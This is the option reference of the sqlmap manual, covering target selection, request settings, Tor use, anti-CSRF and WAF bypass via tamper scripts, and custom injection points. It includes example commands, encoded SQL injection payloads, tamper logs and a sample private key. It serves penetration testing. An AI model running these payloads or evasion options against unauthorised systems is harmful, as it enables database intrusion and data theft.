Target

At least one of these options has be provided to set the target(s).

Direct connection to the database

Option: -d

Run sqlmap against a single database instance. This option accepts a connection string in one of following forms:

• DBMS://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME (MySQL, Oracle, Microsoft SQL Server, PostgreSQL, etc.)
• DBMS://DATABASE_FILEPATH (SQLite, Microsoft Access, Firebird, etc.)

For example:

$ python sqlmap.py -d "mysql://admin:admin@192.168.21.17:3306/testdb" -f --bann\
er --dbs --users

Target URL

Option: -u or --url

Run sqlmap against a single target URL. This option requires a target URL in following form:

http(s)://targeturl[:port]/[...]

For example:

$ python sqlmap.py -u "http://www.target.com/vuln.php?id=1" -f --banner --dbs -\
-users

Parse targets from Burp or WebScarab proxy logs

Option: -l

Rather than providing a single target URL, it is possible to test and inject against HTTP requests proxied through Burp proxy or WebScarab proxy. This option requires an argument which is the proxy’s HTTP requests log file.

Parse targets from remote sitemap(.xml) file

Option: -x

A sitemap is a file where web admins can list the web page locations of their site to tell search engines about the site content’s organization. You can provide a sitemap’s location to sqlmap by using option -x (e.g. -x http://www.target.com/sitemap.xml) so it could find usable target URLs for scanning purposes.

Scan multiple targets enlisted in a given textual file

Option: -m

Providing list of target URLs enlisted in a given bulk file, sqlmap will scan each of those one by one.

Sample content of a bulk file provided as an argument to this option:

www.target1.com/vuln1.php?q=foobar
www.target2.com/vuln2.asp?id=1
www.target3.com/vuln3/id/1*

Load HTTP request from a file

Option: -r

One of the possibilities of sqlmap is loading of raw HTTP request from a textual file. That way you can skip usage of a number of other options (e.g. setting of cookies, POSTed data, etc).

Sample content of a HTTP request file provided as an argument to this option:

POST /vuln.php HTTP/1.1
Host: www.target.com
User-Agent: Mozilla/4.0

id=1

Note that if the request is over HTTPS, you can use this in conjunction with switch --force-ssl to force SSL connection to 443/tcp. Alternatively, you can append :443 to the end of the Host header value.

Process Google dork results as target addresses

Option: -g

It is also possible to test and inject on GET parameters based on results of your Google dork.

This option makes sqlmap negotiate with the search engine its session cookie to be able to perform a search, then sqlmap will retrieve Google first 100 results for the Google dork expression with GET parameters asking you if you want to test and inject on each possible affected URL.

For example:

$ python sqlmap.py -g "inurl:\".php?id=1\""

Load options from a configuration INI file

Option: -c

It is possible to pass user’s options from a configuration INI file, an example is sqlmap.conf.

Note that if you provide other options from command line, those are evaluated when running sqlmap and overwrite those provided in the configuration file.

Request

These options can be used to specify how to connect to the target URL.

HTTP method

Option: --method

sqlmap automatically detects the proper HTTP method to be used in HTTP requests. Nevertheless, in some cases, it is required to force the usage of specific HTTP method (e.g. PUT) that is not used by automatism. This is possible with usage of this option (e.g. --method=PUT).

HTTP data

Option: --data

By default the HTTP method used to perform HTTP requests is GET, but you can implicitly change it to POST by providing the data to be sent in the POST requests. Such data, being those parameters, are tested for SQL injection as well as any provided GET parameters.

For example:

$ python sqlmap.py -u "http://www.target.com/vuln.php" --data="id=1" -f --banne\
r --dbs --users

Parameter splitting character

Option: --param-del

There are cases when default parameter delimiter (e.g. & in GET and POST data) needs to be overwritten for sqlmap to be able to properly split and process each parameter separately.

For example:

$ python sqlmap.py -u "http://www.target.com/vuln.php" --data="query=foobar;id=\
1" --param-del=";" -f --banner --dbs --users

HTTP Cookie header

Options and switch: --cookie, --cookie-del, --load-cookies and --drop-set-cookie

These options and switches can be used in two situations:

• The web application requires authentication based upon cookies and you have such data.
• You want to detect and exploit SQL injection on such header values.

Either reason brings you to need to send cookies with sqlmap requests, the steps to go through are the following:

• Login to the application with your favourite browser.
• Get the HTTP Cookie from the browser’s preferences or from the HTTP proxy screen and copy to the clipboard.
• Go back to your shell and run sqlmap by pasting your clipboard as value of the option --cookie.

Note that the HTTP Cookie header values are usually separated by a ; character, not by an &. sqlmap can recognize these as separate sets of parameter=value too, as well as GET and POST parameters. In case that the separation character is other than ; it can be specified by using option --cookie-del.

If at any time during the communication, the web application responds with Set-Cookie headers, sqlmap will automatically use its value in all further HTTP requests as the Cookie header. sqlmap will also automatically test those values for SQL injection. This can be avoided by providing the switch --drop-set-cookie – sqlmap will ignore any coming Set-Cookie header.

Vice versa, if you provide a HTTP Cookie header with option --cookie and the target URL sends an HTTP Set-Cookie header at any time, sqlmap will ask you which set of cookies to use for the following HTTP requests.

There is also an option --load-cookies which can be used to provide a special file containing Netscape/wget formatted cookies.

Note that also the HTTP Cookie header is tested against SQL injection if the --level is set to 2 or above. Read below for details.

HTTP User-Agent header

Option and switch: --user-agent and --random-agent

By default sqlmap performs HTTP requests with the following User-Agent header value:

sqlmap/1.0-dev-xxxxxxx (http://sqlmap.org)

However, it is possible to fake it with the option --user-agent by providing custom User-Agent as the option’s argument.

Moreover, by providing the switch --random-agent, sqlmap will randomly select a User-Agent from the ./txt/user-agents.txt textual file and use it for all HTTP requests within the session.

Some sites perform a server-side check of HTTP User-Agent header value and fail the HTTP response if a valid User-Agent is not provided, its value is not expected or is blacklisted by a web application firewall or similar intrusion prevention system. In this case sqlmap will show you a message as follows:

[hh:mm:20] [ERROR] the target URL responded with an unknown HTTP status code, try to 
force the HTTP User-Agent header with option --user-agent or --random-agent

Note that also the HTTP User-Agent header is tested against SQL injection if the --level is set to 3or above. Read below for details.

HTTP Host header

Option: --host

You can manually set HTTP Host header value. By default HTTP Host header is parsed from a provided target URL.

Note that also the HTTP Host header is tested against SQL injection if the --level is set to 5. Read below for details.

HTTP Referer header

Option: --referer

It is possible to fake the HTTP Referer header value. By default no HTTP Referer header is sent in HTTP requests if not explicitly set.

Note that also the HTTP Referer header is tested against SQL injection if the --level is set to 3 or above. Read below for details.

Extra HTTP headers

Option: --headers

It is possible to provide extra HTTP headers by setting the option --headers. Each header must be separated by a newline and it is much easier to provide them from the configuration INI file. You can take a look at the sample sqlmap.conf file for such case.

Example against a MySQL target:

$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?id=1" -z \
"ign,flu,bat,tec=E" --headers="Host:www.target.com\nUser-agent:Firefox 1.0" -v 5
[...]
[xx:xx:44] [TRAFFIC OUT] HTTP request [#5]:
GET /sqlmap/mysql/get_int.php?id=1%20AND%20%28SELECT%209351%20FROM%28SELECT%20C\
OUNT%28%2A%29%2CCONCAT%280x3a6161733a%2C%28SELECT%20%28CASE%20WHEN%20%285473%20\
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%\
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2\
0%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20\
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%\
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2\
0%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20\
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%\
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2\
0%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20\
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3D%20%20%20%20%20%20%20%\
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2\
0%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20\
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%\
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2\
0%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20\
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%\
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2\
0%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20\
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%\
20%20%20%20%20%20%20%20%20%20%20%205473%29%20THEN%201%20ELSE%200%20END%29%29%2C\
0x3a6c666d3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARA\
CTER_SETS%20GROUP%20BY%20x%29a%
29 HTTP/1.1
Host: www.target.com
Accept-encoding: gzip,deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-agent: Firefox 1.0
Connection: close
[...]

HTTP protocol authentication

Options: --auth-type and --auth-cred

These options can be used to specify which HTTP protocol authentication back-end web server implements and the valid credentials to be used to perform all HTTP requests to the target application.

The three supported HTTP protocol authentication mechanisms are:

• Basic
• Digest
• NTLM

While the credentials’ syntax is username:password.

Example of valid syntax:

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/basic/get_int.php?id\
=1" --auth-type Basic --auth-cred "testuser:testpass"

HTTP protocol private key authentication

Option: --auth-file

This option should be used in cases when the web server requires proper client-side certificate and a private key for authentication. Supplied value should be a PEM formatted key_file that contains your certificate and a private key.

Example of generation of a key_file.txt that is compatible with --auth-file:

$ openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout auth_file.key -out auth_file.pem &&\
cat auth_file.key auth_file.pem > auth_file.txt && cat auth_file.txt
Generating a 2048 bit RSA private key
.........+++
...........+++
writing new private key to 'auth_file.key'
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:
State or Province Name (full name) [Some-State]:
Locality Name (eg, city) []:
Organization Name (eg, company) [Internet Widgits Pty Ltd]:
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:
Email Address []:
-----BEGIN PRIVATE KEY-----
MIIEvwIBADANBgkqhkiG9w0BAQEFAASCBKkwggSlAgEAAoIBAQCWM28J1ua2DINf
VLU28oeJwQidL9vTRoGJR5pfBU6Mhu33Cv6RuVEJAfMWEKYDSbqbrEyy1zUiNTcG
mEd026Peq0SPRvsKsVb6K+EHVF3r+6ExXHEctPRbh2GIzi2kCQMkdHDg+DhmieQ9
9Haxk9IREJZTo2vC1ohvM5M/yubw4iwgMlDaW+4s82OgOcCLjewbPLFZU5gMV+8W
XLKUttUYwV79duPbEvG9S1soNFHhu/MOcNiKJpH2zSegd9Dk5/OJRGX5xEiv7AyL
4shQLpAqn5kuZcm2K+ib/4x/Rw2yT1Slh2tQIi8RcwlYyycOrSqvhW7vvdqkblbY
mQQyR2ChAgMBAAECggEBAIqvMveC1cOCCksbi7cQeNVYxvtcFT0e/LwkwQS7gat/
anmQTT2APrJyemEFPkQK76KNlMQMsaLEP+p28IOVydjvin5Aq8tTs1uK6Fw8Kfya
elt5X3eCHZ3lgskuljW/nIcsfI08o9cJuxT5hB6yvmPDTQos+nMMYy1KEcv1LQd8
Y+QAmVQqMF5Nyf8Q6op6hWZIIJY5NDbRE0zYzhGcHWg2798Dx1sO0HT6TD8cNP8H
AVp/V21tzpmFpe0A7NajgYEjkij6fg+6mG0j0WZdWymYXDeiTdDpwzs/SPRevBLn
Okp/6vqtdekMeYL591MNBl8GRZpJW9gNLRX7vQ6YYAECgYEAxGV9e85GpLUd/uUb
1MvGajd+HtN/uoWH1ySG34vi3q/dDKBehry2yoDUosxXf9vbH0IrvaXnO8yXGflS
wb2TELLezGWbw6kPaw2XIgL4elO5TPh2rNJwz1wOhv3FT2XSGJbXx/CED3mL7MGs
qwRU/bRrNV7RmzV2veThlLCLjZECgYEAw8jm7vOzQQnqEjs0wlfJmzOyFqilYvEP
8v7HxDv1M7e7M0TqLECET9VlQE5spGuzEWN7/iMtE8xxnz2n/vGnGAV8qv1LJYrA
TWQMTIC6V9/jKM8wNOfT7Eh1rJ1cty87yokXpy/cdmkv7yxb1b2zuBk8/1nlYqA0
5uqb345eWhECgYEAmoXv0TVfR8BpNWA2IZujJXc7+C0YVj0xwAixRbneaq+cEI8t
UH2ypGnw45Y7UhI9ub5qg/DAmsBCMuGER4NM7tqNiex4Pd4Kj4RF4TDNKBIvvWvQ
k/GPaNdZZsTMNcg7IbWtWVbX0QUlHsbTgEsMRAFsSLWt3ZyXLJmlE0REyMECgYEA
oCqEscrwRC7GLK/+01ZZ+fvqnxrMYgrvj0zbRDAAwpR2MtUX9ae6Fk1vDZKa0k/B
KGKIlzlTsTS5ZxpbivdKSR6EBKY+ibHe6/EDFrrgtu7TuRj2SPG2rz//9Hyv0rRz
Z5eLoBxJcR1QN4vEfTE6C0uqWQPD4lFJtfcMGXEwwuECgYAK+4gwPBlrKClrRtDc
7Fnq8RLYeZRbM5WEmTHfRnlYylniMsj2K20H8ln8pdOqCE4iJn0SezIQIaAtcwMP
WQt15kgJgLwM/uBtqDeWRpTEotVMFXQbZImobjpXUhTqu0NWBwbypM/zarfRWPJ4
fJkrlA16caVj3qGaX1lkm06OAA==
-----END PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIDXTCCAkWgAwIBAgIJALTHPlkIs/+KMA0GCSqGSIb3DQEBCwUAMEUxCzAJBgNV
BAYTAkFVMRMwEQYDVQQIDApTb21lLVN0YXRlMSEwHwYDVQQKDBhJbnRlcm5ldCBX
aWRnaXRzIFB0eSBMdGQwHhcNMTgwODIyMDc0NTQxWhcNMTkwODIyMDc0NTQxWjBF
MQswCQYDVQQGEwJBVTETMBEGA1UECAwKU29tZS1TdGF0ZTEhMB8GA1UECgwYSW50
ZXJuZXQgV2lkZ2l0cyBQdHkgTHRkMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIB
CgKCAQEAljNvCdbmtgyDX1S1NvKHicEInS/b00aBiUeaXwVOjIbt9wr+kblRCQHz
FhCmA0m6m6xMstc1IjU3BphHdNuj3qtEj0b7CrFW+ivhB1Rd6/uhMVxxHLT0W4dh
iM4tpAkDJHRw4Pg4ZonkPfR2sZPSERCWU6NrwtaIbzOTP8rm8OIsIDJQ2lvuLPNj
oDnAi43sGzyxWVOYDFfvFlyylLbVGMFe/Xbj2xLxvUtbKDRR4bvzDnDYiiaR9s0n
oHfQ5OfziURl+cRIr+wMi+LIUC6QKp+ZLmXJtivom/+Mf0cNsk9UpYdrUCIvEXMJ
WMsnDq0qr4Vu773apG5W2JkEMkdgoQIDAQABo1AwTjAdBgNVHQ4EFgQUVvHI/2qF
kmRCEWlWB+ZvJzWTnUkwHwYDVR0jBBgwFoAUVvHI/2qFkmRCEWlWB+ZvJzWTnUkw
DAYDVR0TBAUwAwEB/zANBgkqhkiG9w0BAQsFAAOCAQEAg5tmkM75/NEEymu0ublj
c2R1/ZxwbKMjg98KxLqGFJbPVRG0qgIy+uc+Gvh6FEgPF22i4L9DROfuDQW3YSJ6
x3JnJxLsU+jjXxtN7hNwoQziQkicKr0y47TjqOKLlBlKTbdnr74nJXSYQhi4qEFE
qgrUG7ScitgLvcf2sDVf9L2SUsH5iRK+HlgYEtSKhUl5SkLapcUUF+GmectUOkm7
m7Z8gelenVUerLojnQL2avKD07hWTTGkgX2PV8hdun0WIvBLWAcJN+6T9sdakJZZ
qJjFQBXjcxwgVe0vB0vJmqa5lj9OymQnBMjp+3zpUtDJNH2M1qySbU6tGEX1wsW/
VA==
-----END CERTIFICATE-----

Ignore HTTP error 401 (Unauthorized)

Switch --ignore-401

In case that you want to test the site that occasionally returns HTTP error 401 (Unauthorized), while you want to ignore it and continue tests without providing proper credentials, you can use switch --ignore-401

HTTP(S) proxy

Options and switch: --proxy, --proxy-cred, --proxy-file and --ignore-proxy

It is possible to provide an HTTP(S) proxy address to pass by the HTTP(S) requests to the target URL with option --proxy. The syntax of HTTP(S) proxy value is http://url:port.

If the HTTP(S) proxy requires authentication, you can provide the credentials in the format username:password to the option --proxy-cred.

In case that you want to use (disposable) proxy list, skipping to the next proxy on any sign of a connection problem (e.g. blocking of invasive IP address), option --proxy-file can be used by providing filename of a file containing bulk list of proxies.

Switch --ignore-proxy should be used when you want to run sqlmap against a target part of a local area network by ignoring the system-wide set HTTP(S) proxy server setting.

Tor anonymity network

Switches and options: --tor, --tor-port, --tor-type and --check-tor

If, for any reason, you need to stay anonymous, instead of passing by a single predefined HTTP(S) proxy server, you can configure a Tor client together with Privoxy (or similar) on your machine as explained in Tor installation guides. Then you can use a switch --tor and sqlmap will try to automatically set Tor proxy connection settings.

In case that you want to manually set the type and port of used Tor proxy, you can do it with options --tor-type and --tor-port (e.g. --tor-type=SOCKS5 --tor-port 9050).

You are strongly advised to use --check-tor occasionally to be sure that everything was set up properly. There are cases when Tor bundles (e.g. Vidalia) come misconfigured (or reset previously set configuration) giving you a false sense of anonymity. Using this switch sqlmap will check that everything works as expected by sending a single request to an official Are you using Tor? page before any target requests. In case that check fails, sqlmap will warn you and abruptly exit.

Delay between each HTTP request

Option: --delay

It is possible to specify a number of seconds to hold between each HTTP(S) request. The valid value is a float, for instance 0.5 means half a second. By default, no delay is set.

Seconds to wait before timeout connection

Option: --timeout

It is possible to specify a number of seconds to wait before considering the HTTP(S) request timed out. The valid value is a float, for instance 10.5 means ten seconds and a half. By default 30 seconds are set.

Maximum number of retries when the HTTP connection timeouts

Option: --retries

It is possible to specify the maximum number of retries when the HTTP(S) connection timeouts. By default it retries up to three times.

Randomly change value for given parameter(s)

Option: --randomize

It is possible to specify parameter names whose values you want to be randomly changed during each request. Length and type are being kept according to provided original values.

Filtering targets from provided proxy log using regular expression

Option: --scope

Rather than using all hosts parsed from provided logs with option -l, you can specify valid Python regular expression to be used for filtering desired ones.

Example of valid syntax:

$ python sqlmap.py -l burp.log --scope="(www)?\.target\.(com|net|org)"

Avoid your session to be destroyed after too many unsuccessful requests

Options: --safe-url, --safe-post, --safe-req and --safe-freq

Sometimes web applications or inspection technology in between destroys the session if a certain number of unsuccessful requests is performed. This might occur during the detection phase of sqlmap or when it exploits any of the blind SQL injection types. Reason why is that the SQL payload does not necessarily returns output and might therefore raise a signal to either the application session management or the inspection technology.

To bypass this limitation set by the target, you can provide any (or combination of) option:

• --safe-url: URL address to visit frequently during testing.
• --safe-post: HTTP POST data to send to a given safe URL address.
• --safe-req: Load and use safe HTTP request from a file.
• --safe-freq: Test requests between two visits to a given safe location.

This way, sqlmap will visit every a predefined number of requests a certain safe URL without performing any kind of injection against it.

Turn off URL encoding of parameter values

Switch: --skip-urlencode

Depending on parameter placement (e.g. GET) its value could be URL encoded by default. In some cases, back-end web servers do not follow RFC standards and require values to be send in their raw non-encoded form. Use --skip-urlencode in those kind of cases.

Bypass anti-CSRF protection

Options: --csrf-token and --csrf-url

Lots of sites incorporate anti-CSRF protection in form of tokens, hidden field values that are randomly set during each page response. sqlmap will automatically try to recognize and bypass that kind of protection, but there are options --csrf-token and --csrf-url that can be used to further fine tune it. Option --csrf-token can be used to set the name of the hidden value that contains the randomized token. This is useful in cases when web sites use non-standard names for such fields. Option --csrf-url can be used for retrieval of the token value from arbitrary URL address. This is useful if the vulnerable target URL doesn’t contain the necessary token value in the first place, but it is required to extract it from some other location.

Force usage of SSL/HTTPS

Switch: --force-ssl

In case that user wants to force usage of SSL/HTTPS requests toward the target, he can use this switch. This can be useful in cases when urls are being collected by using option --crawl or when Burp log is being provided with option -l.

Evaluate custom python code during each request

Option: --eval

In case that user wants to change (or add new) parameter values, most probably because of some known dependency, he can provide to sqlmap a custom python code with option --eval that will be evaluated just before each request.

For example:

$ python sqlmap.py -u "http://www.target.com/vuln.php?id=1&hash=c4ca4238a0b9238\
20dcc509a6f75849b" --eval="import hashlib;hash=hashlib.md5(id).hexdigest()"

Each request of such run will re-evaluate value of GET parameter hash to contain a fresh MD5 hash digest for current value of parameter id.

Optimization

These switches can be used to optimize the performance of sqlmap.

Bundle optimization

Switch: -o

This switch is an alias that implicitly sets the following options and switches:

• --keep-alive
• --null-connection
• --threads=3 if not set to a higher value.

Read below for details about each switch.

Output prediction

Switch: --predict-output

This switch is used in inference algorithm for sequential statistical prediction of characters of value being retrieved. Statistical table with the most promising character values is being built based on items given in txt/common-outputs.txt combined with the knowledge of current enumeration used. In case that the value can be found among the common output values, as the process progresses, subsequent character tables are being narrowed more and more. If used in combination with retrieval of common DBMS entities, as with system table names and privileges, speed up is significant. Of course, you can edit the common outputs file according to your needs if, for instance, you notice common patterns in database table names or similar.

Note that this switch is not compatible with --threads switch.

HTTP Keep-Alive

Switch: --keep-alive

This switch instructs sqlmap to use persistent HTTP(s) connections.

Note that this switch is incompatible with --proxy switch.

HTTP NULL connection

Switch: --null-connection

There are special HTTP request types which can be used to retrieve HTTP response’s size without getting the HTTP body. This knowledge can be used in blind injection technique to distinguish Truefrom False responses. When this switch is provided, sqlmap will try to test and exploit two different NULL connection techniques: Range and HEAD. If any of these is supported by the target web server, speed up will come from the obvious saving of used bandwidth.

These techniques are detailed in the white paper Bursting Performances in Blind SQL Injection – Take 2 (Bandwidth).

Note that this switch is incompatible with switch --text-only.

Concurrent HTTP(S) requests

Option: --threads

It is possible to specify the maximum number of concurrent HTTP(S) requests that sqlmap is allowed to do. This feature relies on multi-threading concept and inherits both its pro and its cons.

This features applies to the brute-force switches and when the data fetching is done through any of the blind SQL injection techniques. For the latter case, sqlmap first calculates the length of the query output in a single thread, then starts the multi-threading. Each thread is assigned to retrieve one character of the query output. The thread ends when that character is retrieved – it takes up to 7 HTTP(S) requests with the bisection algorithm implemented in sqlmap.

The maximum number of concurrent requests is set to 10 for performance and site reliability reasons.

Note that this option is not compatible with switch --predict-output.

Injection

These options can be used to specify which parameters to test for, provide custom injection payloads and optional tampering scripts.

Testable parameter(s)

Options: -p, --skip and --param-exclude

By default sqlmap tests all GET parameters and POST parameters. When the value of --level is >= 2it tests also HTTP Cookie header values. When this value is >= 3 it tests also HTTP User-Agent and HTTP Referer header value for SQL injections. It is however possible to manually specify a comma-separated list of parameter(s) that you want sqlmap to test. This will bypass the dependence on value of --level too.

For instance, to test for GET parameter id and for HTTP User-Agent only, provide -p "id,user-agent".

In case that user wants to exclude certain parameters from testing, he can use option --skip. That is especially useful in cases when you want to use higher value for --level and test all available parameters excluding some of HTTP headers normally being tested.

For instance, to skip testing for HTTP header User-Agent and HTTP header Referer at --level=5, provide --skip="user-agent,referer".

There is also a possibility to exclude certain parameters from testing based on a regular expression run on their names. In those kind of cases user can use option --param-exclude.

For instance, to skip testing for parameters which contain string token or session in their names, provide --param-exclude="token|session".

URI injection point

There are special cases when injection point is within the URI itself. sqlmap does not perform any automatic test against URI paths, unless manually pointed to. You have to specify these injection points in the command line by appending an asterisk (*) (Note: Havij style %INJECT HERE% is also supported) after each URI point that you want sqlmap to test for and exploit a SQL injection.

This is particularly useful when, for instance, Apache web server’s mod_rewrite module is in use or other similar technologies.

An example of valid command line would be:

$ python sqlmap.py -u "http://targeturl/param1/value1*/param2/value2/"

Arbitrary injection point

Similar to URI injection point, asterisk (*) (Note: Havij style %INJECT HERE% is also supported) can also be used to point to the arbitrary injection point inside GET, POST or HTTP headers. Injection point can be specified by marking it inside the GET parameter value(s) provided with option -u, POST parameter value(s) provided with option --data, HTTP header value(s) provided with options -H, --headers, --user-agent, --referer and/or --cookie, or at generic place inside HTTP request loaded from file with option -r.

An example of valid command line would be:

$ python sqlmap.py -u "http://targeturl" --cookie="param1=value1*;param2=value2"

Force the DBMS

Option: --dbms

By default sqlmap automatically detects the web application’s back-end database management system. sqlmap fully supports the following database management systems:

• MySQL
• Oracle
• PostgreSQL
• Microsoft SQL Server
• Microsoft Access
• IBM DB2
• SQLite
• Firebird
• Sybase
• SAP MaxDB
• HSQLDB
• Informix

If for any reason sqlmap fails to detect the back-end DBMS once a SQL injection has been identified or if you want to avoid an active fingeprint, you can provide the name of the back-end DBMS yourself (e.g. postgresql). For MySQL and Microsoft SQL Server provide them respectively in the form MySQL <version> and Microsoft SQL Server <version>, where <version> is a valid version for the DBMS; for instance 5.0 for MySQL and 2005 for Microsoft SQL Server.

In case you provide --fingerprint together with --dbms, sqlmap will only perform the extensive fingerprint for the specified database management system only, read below for further details.

Note that this option is not mandatory and it is strongly recommended to use it only if you are absolutely sure about the back-end database management system. If you do not know it, let sqlmap automatically fingerprint it for you.

Force the database management system operating system name

Option: --os

By default sqlmap automatically detects the web application’s back-end database management system underlying operating system when this information is a dependence of any other provided switch or option. At the moment the fully supported operating systems are:

• Linux
• Windows

It is possible to force the operating system name if you already know it so that sqlmap will avoid doing it itself.

Note that this option is not mandatory and it is strongly recommended to use it only if you are absolutely sure about the back-end database management system underlying operating system. If you do not know it, let sqlmap automatically identify it for you.

Force usage of big numbers for invalidating values

Switch: --invalid-bignum

In cases when sqlmap needs to invalidate original parameter value (e.g. id=13) it uses classical negation (e.g. id=-13). With this switch it is possible to force the usage of large integer values to fulfill the same goal (e.g. id=99999999).

Force usage of logical operations for invalidating values

Switch: --invalid-logical

In cases when sqlmap needs to invalidate original parameter value (e.g. id=13) it uses classical negation (e.g. id=-13). With this switch it is possible to force the usage of boolean operations to fulfill the same goal (e.g. id=13 AND 18=19).

Force usage of random strings for invalidating values

Switch: --invalid-string

In cases when sqlmap needs to invalidate original parameter value (e.g. id=13) it uses classical negation (e.g. id=-13). With this switch it is possible to force the usage of random strings to fulfill the same goal (e.g. id=akewmc).

Turn off payload casting mechanism

Switch: --no-cast

When retrieving results, sqlmap uses a mechanism where all entries are being casted to string type and replaced with a whitespace character in case of NULL values. That is being made to prevent any erroneous states (e.g. concatenation of NULL values with string values) and to easy the data retrieval process itself. Nevertheless, there are reported cases (e.g. older versions of MySQL DBMS) where this mechanism needed to be turned-off (using this switch) because of problems with data retrieval itself (e.g. None values are returned back).

Turn off string escaping mechanism

Switch: --no-escape

In cases when sqlmap needs to use (single-quote delimited) string values inside payloads (e.g. SELECT 'foobar'), those values are automatically being escaped (e.g. SELECT CHAR(102)+CHAR(111)+CHAR(111)+CHAR(98)+CHAR(97)+CHAR(114)). That is being done because of two things: obfuscation of payload content and preventing potential problems with query escaping mechanisms (e.g. magic_quotes and/or mysql_real_escape_string) at the back-end server. User can use this switch to turn it off (e.g. to reduce payload size).

Custom injection payload

Options: --prefix and --suffix

In some circumstances the vulnerable parameter is exploitable only if the user provides a specific suffix to be appended to the injection payload. Another scenario where these options come handy presents itself when the user already knows that query syntax and want to detect and exploit the SQL injection by directly providing a injection payload prefix and suffix.

Example of vulnerable source code:

$query = "SELECT * FROM users WHERE id=('" . $_GET['id'] . "') LIMIT 0, 1";

To detect and exploit this SQL injection, you can either let sqlmap detect the boundaries (as in combination of SQL payload prefix and suffix) for you during the detection phase, or provide them on your own.

For example:

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_str_brackets.php\
?id=1" -p id --prefix "')" --suffix "AND ('abc'='abc"
[...]

This will result in all sqlmap requests to end up in a query as follows:

$query = "SELECT * FROM users WHERE id=('1') <PAYLOAD> AND ('abc'='abc') LIMIT 0, 1";

Which makes the query syntactically correct.

In this simple example, sqlmap could detect the SQL injection and exploit it without need to provide custom boundaries, but sometimes in real world application it is necessary to provide it when the injection point is within nested JOIN queries for instance.

Tamper injection data

Option: --tamper

sqlmap itself does no obfuscation of the payload sent, except for strings between single quotes replaced by their CHAR()-alike representation.

This option can be very useful and powerful in situations where there is a weak input validation mechanism between you and the back-end database management system. This mechanism usually is a self-developed input validation routine called by the application source code, an expensive enterprise-grade IPS appliance or a web application firewall (WAF). All buzzwords to define the same concept, implemented in a different way and costing lots of money, usually.

To take advantage of this option, provide sqlmap with a comma-separated list of tamper scripts and this will process the payload and return it transformed. You can define your own tamper scripts, use sqlmap ones from the tamper/ folder or edit them as long as you concatenate them comma-separated as value of the option --tamper (e.g. --tamper="between,randomcase").

The format of a valid tamper script is as follows:

# Needed imports
from lib.core.enums import PRIORITY

# Define which is the order of application of tamper scripts against
# the payload
__priority__ = PRIORITY.NORMAL

def tamper(payload):
    '''
    Description of your tamper script
    '''

    retVal = payload

    # your code to tamper the original payload

    # return the tampered payload
    return retVal

You can check valid and usable tamper scripts in the tamper/ directory.

Example against a MySQL target assuming that > character, spaces and capital SELECT string are banned:

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.php?id=1" --\
tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py -v 3

[hh:mm:03] [DEBUG] cleaning up configuration parameters
[hh:mm:03] [INFO] loading tamper script 'between'
[hh:mm:03] [INFO] loading tamper script 'randomcase'
[hh:mm:03] [INFO] loading tamper script 'space2comment'
[...]
[hh:mm:04] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[hh:mm:04] [PAYLOAD] 1)/**/And/**/1369=7706/**/And/**/(4092=4092
[hh:mm:04] [PAYLOAD] 1)/**/AND/**/9267=9267/**/AND/**/(4057=4057
[hh:mm:04] [PAYLOAD] 1/**/AnD/**/950=7041
[...]
[hh:mm:04] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[hh:mm:04] [PAYLOAD] 1/**/anD/**/(SELeCt/**/9921/**/fROm(SELeCt/**/counT(*),CONC
AT(cHar(58,117,113,107,58),(SELeCt/**/(case/**/whEN/**/(9921=9921)/**/THeN/**/1/
**/elsE/**/0/**/ENd)),cHar(58,106,104,104,58),FLOOR(RanD(0)*2))x/**/fROm/**/info
rmation_schema.tables/**/group/**/bY/**/x)a)
